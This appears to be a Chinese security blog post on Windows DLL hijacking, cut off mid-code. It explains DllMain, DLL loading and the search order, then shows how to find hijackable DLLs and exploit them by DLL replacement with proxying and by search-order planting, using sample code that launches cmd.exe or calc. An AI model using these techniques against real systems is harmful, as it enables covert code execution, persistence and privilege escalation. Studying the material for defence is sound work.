<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="DLL劫持, Yang Hao&#39;s blog">
    <meta name="description" content="Yang Hao&#39;s blog">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id=G-KYC8PY5RS4"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }

    gtag('js', new Date());
    gtag('config', 'G-KYC8PY5RS4');
</script>


    <title>DLL劫持 | Yang Hao&#39;s blog</title>
    <link rel="icon" type="image/x-icon, image/vnd.microsoft.icon" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/favicon.ico">

    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/css/my.css">

    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/jquery/jquery.min.js"></script>
	<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/live2d-widget/autoload.js"></script>

<meta name="generator" content="Hexo 5.1.1"><link rel="alternate" href="/atom.xml" title="Yang Hao's blog" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Yang Hao&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="javascript:void(0);" class="waves-effect waves-light">

      
      <i class="fas fa-list" style="zoom: 0.6;"></i>
      
      <span>文章</span>
      <i class="fas fa-chevron-down" aria-hidden="true" style="zoom: 0.6;"></i>
    </a>
    <ul class="sub-nav menus_item_child ">
      
      <li>
        <a href="/tags">
          
          <i class="fas fa-tags" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>标签</span>
        </a>
      </li>
      
      <li>
        <a href="/categories">
          
          <i class="fas fa-bookmark" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>分类</span>
        </a>
      </li>
      
      <li>
        <a href="/archives">
          
          <i class="fas fa-archive" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>归档</span>
        </a>
      </li>
      
    </ul>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Yang Hao&#39;s blog</div>
        <div class="logo-desc">
            
            Yang Hao&#39;s blog
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="javascript:;">
			
				<i class="fa-fw fas fa-list"></i>
			
			文章
			<span class="m-icon"><i class="fas fa-chevron-right"></i></span>
		</a>
            <ul  style="background:  ;" >
              
                <li>

                  <a href="/tags " style="margin-left:50px">
				  
				   <i class="fa fas fa-tags" style="position: absolute;left:28px" ></i>
			      
		          <span>标签</span>
                  </a>
                </li>
              
                <li>

                  <a href="/categories " style="margin-left:50px">
				  
				   <i class="fa fas fa-bookmark" style="position: absolute;left:28px" ></i>
			      
		          <span>分类</span>
                  </a>
                </li>
              
                <li>

                  <a href="/archives " style="margin-left:50px">
				  
				   <i class="fa fas fa-archive" style="position: absolute;left:28px" ></i>
			      
		          <span>归档</span>
                  </a>
                </li>
              
            </ul>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_11/e0f5f87f01e358d667c07683c647c83e.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">DLL劫持</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Windows-DLL%E5%8A%AB%E6%8C%81/">
                                <span class="chip bg-color">Windows DLL劫持</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/" class="post-category">
                                基础漏洞
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-09-06
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2021-11-18
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    6.2k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    24 分
                </div>
                

                
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="0x01-简介"><a href="#0x01-简介" class="headerlink" title="0x01 简介"></a>0x01 简介</h2><p>DLL劫持是一种诱使正常的应用程序加载任意DLL的技术，通过这种技术，DLL将会被加载到目标程序内存中，以目标程序身份进行代码执行、权限维持和权限提升。</p>
<h2 id="0x02-什么是-DLL"><a href="#0x02-什么是-DLL" class="headerlink" title="0x02 什么是 DLL"></a>0x02 什么是 DLL</h2><p>在进行DLL劫持之前，先熟悉一下什么是DLL。在WIndows中DLL(Dynamic link library，动态链接库)是一个共享的库，其中包含可同时由多个程序使用的代码和数据，对常用函数和功能进行封装，这些DLL可实现不同的功能，每个DLL的功能实现可通过导出函数来提供调用接口。在Windows的不同系统目录中存在大量的DLL文件，应用程序在实现时相应的功能时会调用这些DLL程序。</p>
<h3 id="DLL-入口函数"><a href="#DLL-入口函数" class="headerlink" title="DLL 入口函数"></a>DLL 入口函数</h3><p><code>dllmain</code>是DLL的入口函数，当进程或线程加载DLL或分离DLL时，将调用入口点函数传入对应事件通知，示例：</p>
<pre class="line-numbers language-c++"><code class="language-c++">// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdio.h>
BOOL APIENTRY DllMain( HMODULE hModule, //  DLL模块的句柄
                       DWORD  ul_reason_for_call, // 调用函数的原因
                       LPVOID lpReserved  // 保留参数
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:      // 进程加载DLL触发( LoadLibraryA)
        {  printf("DLL_PROCESS_ATTACH!\n");
        WinExec("cmd.exe", 0); break; }
    case DLL_THREAD_ATTACH:       // 进程创建新线程加载触发(CreateThread)
        {  break; }
    case DLL_THREAD_DETACH:       // 线程正常退出(CreateThread-Return)
        {  break; }
    case DLL_PROCESS_DETACH:      // 进程卸载DLL(函数：FreeLibrary、FreeLibraryAndExitThread)
        { break; }
  }
    return TRUE;
}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="DLL-导出函数"><a href="#DLL-导出函数" class="headerlink" title="DLL 导出函数"></a>DLL 导出函数</h3><p>编写DLL时通过<code>__declspec(dllexport)</code>关键字声明要导出的函数：</p>
<pre class="line-numbers language-c++"><code class="language-c++">extern "C" __declspec(dllexport) void StartW(HWND hwnd,HINSTANCE hinst){
///
}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>这样编写的DLL生成后可以通过<code>dumpbin /EXPORTS xxx.dll</code>查看导出函数表:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/af012daf3b88052cd24f7f374f70f3cb.png"></p>
<p>在VS中选择可“具有导出项的(DLL)动态链接库”项目编写DLL：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/eb948a5aa873e0458dc3985afa59af87.png"></p>
<p>这种项目生成DLL的导出函数是通过<code>LIBDLL_API</code>定义的，如<code>LibDLL.h</code>中导出的<code>fnLibDLL</code>函数：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/156221e59808a4686af76fc0f51ed559.png"><br><code>LibDLL.cpp</code>中编写导出函数的功能：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/85236108c7a88461026ff3eb1d6ac62a.png"><br>项目编译后的DLL文件导出函数是被修饰过的：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/dc54ffc9de23b36428a7ad8caadb6cee.png"></p>
<h2 id="0x03-加载-DLL-的方法"><a href="#0x03-加载-DLL-的方法" class="headerlink" title="0x03 加载 DLL 的方法"></a>0x03 加载 DLL 的方法</h2><p>在应用程序中可以通过<strong>加载时动态链接</strong>或<strong>运行时动态链接</strong>两种方法调用DLL中的导出函数。加载时动态链接使用<code>#include &lt;xxx.h&gt;</code>导入头文件和<code>#pragma comment(lib, "xxx.lib")</code>导入链接库文件，程序会使用链接器放置在文件中的信息来查找进程使用的 DLL 的名称，然后搜索 DLL进行调用，这种方式是使用lib静态库文件进行链接，所以也被称为静态链接。运行时动态链接是在程序需要的时候使用<code>LoadLibrary</code>、<code>LoadLibraryEx</code>、<code>GetProcAddress</code> 等API函数组合获取到DLL导出函数的地址来调用，所以也称为动态链接。</p>
<h3 id="加载时动态链接"><a href="#加载时动态链接" class="headerlink" title="加载时动态链接"></a>加载时动态链接</h3><p>在上文中编写了一个具有导出函数的DLL文件，这里使用静态链接的方式调用DLL函数,<code>LibDLL.h</code>、<code>LibDLL.lib</code>都是在DLL项目生成或者定义的：</p>
<pre class="line-numbers language-c++"><code class="language-c++">#include <iostream>
#include "..\\LibDLL\\LibDLL.h"
#pragma comment(lib, "..\\LibDLL\\Release\\LibDLL.lib")
int main()
{
    fnLibDLL();
}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>编写的EXE程序运行后成功调用了DLL中的<code>fnLibDLL</code>函数：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/b390b4b3fe0cb5c2dec5fe4e07f40d69.png"><br>如果在DLL中没有<code>fnLibDLL</code>函数，静态链接的DllMain函数不会执行并且会抛出异常：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/f97b3fd5f09b6e4fa12210054404440b.png"></p>
<h3 id="运行时动态链接"><a href="#运行时动态链接" class="headerlink" title="运行时动态链接"></a>运行时动态链接</h3><p>通过<code>LoadLibrary</code>获取DLL句柄， <code>GetProcAddress</code> 从返回的句柄中获取函数的地址(注意这里的函数名用的是被修饰过的<code>?fnLibDLL@@YAHXZ</code>)：</p>
<pre class="line-numbers language-c++"><code class="language-c++">#include <iostream>
#include <windows.h>
#include <libloaderapi.h>
int main()
{
    int(__stdcall * CMD)();
    HMODULE DLL = LoadLibrary(L"LibDLL.dll");
    (FARPROC&)CMD = GetProcAddress(DLL, "?fnLibDLL@@YAHXZ");
    CMD();
}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/9a37229001159aab0fe6f330221c0a93.png"></p>
<p>加载有<code>DllMain</code>的DLL时，<code>LoadLibrary</code>后就进入<code>DllMain</code>函数了(与静态链接不同，即使调用的函数不存在也会执行DllMain)：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/3f7a4677b83e7661ad56426c3c199217.png"></p>
<h2 id="0x04-DLL-搜索顺序"><a href="#0x04-DLL-搜索顺序" class="headerlink" title="0x04 DLL 搜索顺序"></a>0x04 DLL 搜索顺序</h2><p>在程序通过上述两种方式加载DLL时，都会进行DLL的搜索。会加载搜索过程中找到的第一个名称正确的DLL。系统搜索DLL之前，它会检查以下内容，如果已经存在了就不会搜索DLL：</p>
<ol>
<li>如果内存中已经加载了具有相同模块名称的 DLL。</li>
<li>KnownDLLs注册表项（HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs）。</li>
</ol>
<p>上面都没有找到DLL的情况下，如果启用了<code>SafeDllSearchMode</code>， 就按照如下搜索顺序搜索：</p>
<ol>
<li>应用程序加载目录(安装目录)；</li>
<li>系统目录(C:\Windows\System32，使用 GetSystemDirectory 函数获取)；</li>
<li>16 位系统目录(C:\Windows\System);</li>
<li>Windows 目录(C:\Windows,使用 GetWindowsDirectory函数获取);</li>
<li>当前目录;</li>
<li>PATH 环境变量中列出的目录。 </li>
</ol>
<p>如果 <code>SafeDllSearchMode</code> 已禁用，则搜索顺序如下：</p>
<ol>
<li>应用程序加载目录(安装目录)；</li>
<li>当前目录;</li>
<li>系统目录(C:\Windows\System32，使用 GetSystemDirectory 函数获取)；</li>
<li>16 位系统目录(C:\Windows\System);</li>
<li>Windows 目录(C:\Windows,使用 GetWindowsDirectory函数获取);</li>
<li>PATH 环境变量中列出的目录。 </li>
</ol>
<h2 id="0x05-发现-DLL-劫持"><a href="#0x05-发现-DLL-劫持" class="headerlink" title="0x05 发现 DLL 劫持"></a>0x05 发现 DLL 劫持</h2><p>从上述中可以看到，DLL加载时会按照顺序进行搜索，如果一个DLL位于<code>C:\Windows\System32</code>的系统目录且不在<code>KnownDLLs</code>注册表项中，程序使用LoadLibrary直接加载DLL名称时就会先搜索系统目录之前的应用程序加载目录或当前目录，通过在系统目录之前的位置放置同名DLL就可能导致DLL搜索顺序劫持。一些程序在启动或执行某些功能时会  借助下列工具可快速发现程序在加载DLL时的问题。</p>
<h3 id="Process-Monitor"><a href="#Process-Monitor" class="headerlink" title="Process Monitor"></a>Process Monitor</h3><p>微软官方提供了一个<a target="_blank" rel="noopener" href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suite">系统工具套件</a>，其中包含一个进程监控工具 <code>Procmon.exe</code>，可以使用该工具来寻找可能发生DLL劫持的程序，微软文档介绍的<a target="_blank" rel="noopener" href="https://docs.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-library-security?redirectedfrom=MSDN">使用进程监视器检查应用程序中的 DLL 加载操作</a>如下：<br>1.启动进程监视器。<br>2.在进程监视器中，包括以下筛选器：</p>
<pre class="line-numbers language-python"><code class="language-python">Operation <span class="token keyword">is</span> CreateFile
Operation <span class="token keyword">is</span> Load Image
Path contains <span class="token punctuation">.</span>cpl
Path contains <span class="token punctuation">.</span>dll
Path contains <span class="token punctuation">.</span>drv
Path contains <span class="token punctuation">.</span>exe
Path contains <span class="token punctuation">.</span>ocx
Path contains <span class="token punctuation">.</span>scr
Path contains <span class="token punctuation">.</span>sys<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>3.排除以下筛选器：</p>
<pre class="line-numbers language-python"><code class="language-python">Process Name <span class="token keyword">is</span> procmon<span class="token punctuation">.</span>exe
Process Name <span class="token keyword">is</span> Procmon64<span class="token punctuation">.</span>exe
Process Name <span class="token keyword">is</span> System
Operation begins <span class="token keyword">with</span> IRP_MJ_
Operation begins <span class="token keyword">with</span> FASTIO_
Result <span class="token keyword">is</span> SUCCESS
Path ends <span class="token keyword">with</span> pagefile<span class="token punctuation">.</span>sys<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>4.尝试在程序安装目录启动程序；尝试将程序复制到其他目录启动程序；尝试启动程序支持解析的扩展文件(如启动.docx)。<br>5.检查进程监视器输出中的可疑路径，如调用当前目录加载 DLL。 这种调用表示应用程序中可能存在漏洞。<br>在进程监视器中输出了进程加载的行为,后续可针对这些程序进行DLL劫持测试：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/e62dc89ed6e7973b1a532135d0dfc1d4.png"></p>
<p>通过该工具验证DLL搜索顺序。某程序使用<code> LoadLibrary(L"qax.dll");</code>后的搜索顺序如下：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/1f4527affc61aa31808e5079312d2d5a.png"></p>
<h3 id="ImpulsiveDLLHijack"><a href="#ImpulsiveDLLHijack" class="headerlink" title="ImpulsiveDLLHijack"></a>ImpulsiveDLLHijack</h3><p><a target="_blank" rel="noopener" href="https://github.com/knight0x07/ImpulsiveDLLHijack">ImpulsiveDLLHijack</a>  通过解析ProcMon 监控数据，得到进程加载DLL的信息，将测试DLL添加或替换到程序目录下，然后反复启动程序加载测试DLL。程序的源码中包含了已编译的程序，可以直接使用(建议虚拟机中)：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/301987f07ea2f7c9ace78aec4ba31008.png"><br>执行命令来测试劫持 <code>ImpulsiveDLLHijack.exe -path "D:\Program Files (x86)\Notepad++\notepad++.exe"</code>，执行完成后会显示结果和写入日志：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/005da7a7a3ab8b54d3d997d2fed0eb30.png"><br>这些劫持成功的可以用<code>Calc DLL POC</code>文件夹下弹出计算器的DLL验证：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/0d346bf7e5d8eb4ffeaa61959787773f.png"></p>
<p>程序显示劫持成功的DLL都是可以直接进入DllMain函数，如<code>uxtheme.dll</code>甚至可以用<code>beacon.dll</code>不做任何处理进行替换。其他的DLL可能需要进行导出函数的代理转发或线程迁移才能正常运行，否则会抛出一些异常信息，这部分实现会在后文继续涉及。</p>
<h3 id="其他方式"><a href="#其他方式" class="headerlink" title="其他方式"></a>其他方式</h3><p>在程序的安装目录中存在许多的DLL，程序在触发某些操作时会进行加载，如果不借助工具怎么快速发现程序加载DLL的行为进行利用呢？一种是将可执行文件复制到其他目录，然后执行文件，利用异常来发现程序的加载行为：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/90f65e6ea8c43de399ff5075a5927b31.png"><br>这个程序在启动时会加载<code>QQMusicCommon.dll</code>，就可以针对该DLL进行劫持。另一种操作比较暴力，运行程序后尝试删除程序目录下文件，加载中的DLL因为句柄占用无法删除：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/fc1a53a9a4b70bfbe368c8c609c5f9fd.png"><br>之后就可以针对这些DLL进行劫持测试了。</p>
<h2 id="0x06-DLL-劫持的方法"><a href="#0x06-DLL-劫持的方法" class="headerlink" title="0x06 DLL 劫持的方法"></a>0x06 DLL 劫持的方法</h2><p>关于DLL劫持根据不同的方法可以进行细分，成功与否取决于应用程序如何配置以加载其所需的 DLL(这部分细分来写的原因在于DLL劫持的不同场景需要的条件不尽相同，包括到文件夹的权限、DLL代码编写、利用场景的限制、程序能否正常运行等)。从更深层的利用角度来说可能一些劫持方法如下：</p>
<h3 id="DLL-替换"><a href="#DLL-替换" class="headerlink" title="DLL 替换"></a>DLL 替换</h3><p>如果应用程序在加载DLL时没有检查DLL的合法性，可以将程序要加载的DLL替换成恶意 DLL ,然后通过DLL代理将程序的函数调用转发到原始DLL，从而确保程序所有功能保持不变。通过<code>Process Monitor</code> 监控Navicat加载了freeimage.dll，该DLL位于Navicat安装目录，对这个DLL进行替换测试：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/f28957f508f9c0c52ab4395310e4e9ed.png"><br>可使用<a target="_blank" rel="noopener" href="https://github.com/kiwings/DLLHijacker">DLLHijacker</a> 脚本来对DLL函数进行转发生成VS项目(这个脚本用于测试会很方便，修改源码后直接编译就可以了)：</p>
<pre class="line-numbers language-python"><code class="language-python">python3 DLLHijacker<span class="token punctuation">.</span>py <span class="token string">"D:\Program Files\PremiumSoft\Navicat Premium 15\freeimage.dll"</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/36a706891b4f80812f3c166b54887f4c.png"><br>要转发到的真实DLL:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/ba43a1268b2c9099347630a604b91d5d.png"><br>注入calc的shellcode到新进程rundll32.exe：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/038df633694e2a9fdcb8bca47ef76530.png"><br>启动后加载DLL触发calc执行：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/42b655d77cf2da598bde67fce82d25d5.png"></p>
<h3 id="DLL-搜索顺序劫持"><a href="#DLL-搜索顺序劫持" class="headerlink" title="DLL 搜索顺序劫持"></a>DLL 搜索顺序劫持</h3><p>在程序加载DLL的实际搜索位置之前放置DLL劫持搜索顺序，这些搜索位置还可以使用 在程序中使用<code>AddDllDirectory</code> 或 <code>SetDllDirectory</code>添加。根据 DLL 搜索顺序中可以植入恶意 DLL 的位置，漏洞大致属于以下三类之一(<a target="_blank" rel="noopener" href="https://msrc-blog.microsoft.com/2018/04/04/triaging-a-dll-planting-vulnerability">对 DLL 植入漏洞进行分类</a>)： </p>
<ol>
<li>应用程序目录(App Dir) DLL 劫持。 </li>
<li>当前工作目录 (CWD) DLL 劫持。 </li>
<li>PATH目录 DLL 劫持。 </li>
</ol>
<p>比较常见的是程序使用一些API函数时，造成的DLL搜索顺序劫持，如下使用<code>version.dll</code>中的<code>GetFileVersionInfoSizeA</code>函数：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/778d040141db055ee4108fcb43a91bf3.png"><br>程序使用静态链接和动态链接两种方式执行函数的源码为：</p>
<pre class="line-numbers language-cpp"><code class="language-cpp"><span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;iostream></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;windows.h></span></span>
<span class="token macro property">#<span class="token directive keyword">pragma</span> comment( lib, "Version.lib" )</span>
<span class="token keyword">int</span> <span class="token function">Action</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
    <span class="token function">Sleep</span><span class="token punctuation">(</span><span class="token number">3000</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"\n使用动态链接:\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">DWORD</span><span class="token punctuation">(</span>__stdcall <span class="token operator">*</span> GetFileVersionInfoX<span class="token punctuation">)</span><span class="token punctuation">(</span>
        LPCSTR  lptstrFilename<span class="token punctuation">,</span>LPDWORD lpdwHandle<span class="token punctuation">)</span><span class="token punctuation">;</span>
    DWORD dwHandle<span class="token punctuation">,</span> sz<span class="token punctuation">;</span>HMODULE DLL <span class="token operator">=</span> <span class="token function">LoadLibrary</span><span class="token punctuation">(</span>L<span class="token string">"version.dll"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>DLL <span class="token operator">==</span> <span class="token constant">NULL</span><span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span><span class="token punctuation">}</span>
    <span class="token punctuation">(</span>FARPROC<span class="token operator">&amp;</span><span class="token punctuation">)</span>GetFileVersionInfoX <span class="token operator">=</span> <span class="token function">GetProcAddress</span><span class="token punctuation">(</span>DLL<span class="token punctuation">,</span> <span class="token string">"GetFileVersionInfoSizeA"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    sz <span class="token operator">=</span> <span class="token function">GetFileVersionInfoX</span><span class="token punctuation">(</span><span class="token string">"C:\\windows\\system32\\cmd.exe"</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>dwHandle<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"文件大小：%i"</span><span class="token punctuation">,</span> sz<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
